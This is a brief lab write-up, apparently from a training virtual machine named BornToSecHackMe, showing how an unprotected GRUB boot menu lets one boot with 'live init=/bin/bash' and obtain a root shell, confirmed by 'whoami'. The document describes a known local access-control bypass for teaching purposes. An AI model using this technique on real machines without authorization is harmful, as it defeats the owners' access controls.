# GRUB vulnerability

After starting loading the virtual machine press left the `SHIFT` button until the GRUB menu or boot terminal will appear.
As we can see it's not protected by password, so we can simply start execution by `root` user.

Command: `live init=/bin/bash`
> `root@BornToSecHackMe:/#`

Command: `whoami` 
>`root`